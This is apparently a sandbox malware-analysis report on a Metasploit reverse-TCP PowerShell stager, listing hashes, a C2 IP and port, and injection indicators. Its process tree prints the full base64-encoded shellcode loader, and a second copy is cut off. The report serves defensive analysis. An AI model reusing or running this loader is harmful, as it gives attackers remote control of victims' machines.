metasploit | e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303

Analysis

max time kernel
148s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 03:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303.ps1
Size

7KB
MD5

3a857403ef0d05f9cce0527c8f50017e
SHA1

99f5796ce4360edd426b51b6039119e8935237da
SHA256

e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303
SHA512

2bd63b530ebe9c0f794517fe2bd5d958c9e20b8d386d40a47162484527db5db078e2f79d3608f1f5526dfeea7635cba4d65e786f046395a996add394a78d1e4e
SSDEEP

192:wk5qvXhjyhwvz2PrrdIbST3nKTwQXh9Le:wkcXhjyhGzudIk3K8QXhI

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

18.158.58.205:17973

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe
15	2452	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4020	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4020	powershell.exe
4020	powershell.exe
4796	powershell.exe
4796	powershell.exe
1540	powershell.exe
1540	powershell.exe
2452	powershell.exe
2452	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4020 wrote to memory of 4796	4020	powershell.exe	84
PID 4020 wrote to memory of 4796	4020	powershell.exe	84
PID 4796 wrote to memory of 1540	4796	powershell.exe	85
PID 4796 wrote to memory of 1540	4796	powershell.exe	85
PID 1540 wrote to memory of 2452	1540	powershell.exe	87
PID 1540 wrote to memory of 2452	1540	powershell.exe	87
PID 1540 wrote to memory of 2452	1540	powershell.exe	87
PID 2452 wrote to memory of 2516	2452	powershell.exe	94
PID 2452 wrote to memory of 2516	2452	powershell.exe	94
PID 2452 wrote to memory of 2516	2452	powershell.exe	94
PID 2516 wrote to memory of 4716	2516	csc.exe	95
PID 2516 wrote to memory of 4716	2516	csc.exe	95
PID 2516 wrote to memory of 4716	2516	csc.exe	95

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv JG -;sv Hgs ec;sv b ((gv JG).value.toString()+(gv Hgs).value.toString());powershell (gv b).value.toString() 'JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASwBnAGEAIAAkAFAAQgBVAHoAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUABCAFUAegAgACQAZQAiADsAfQA='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6A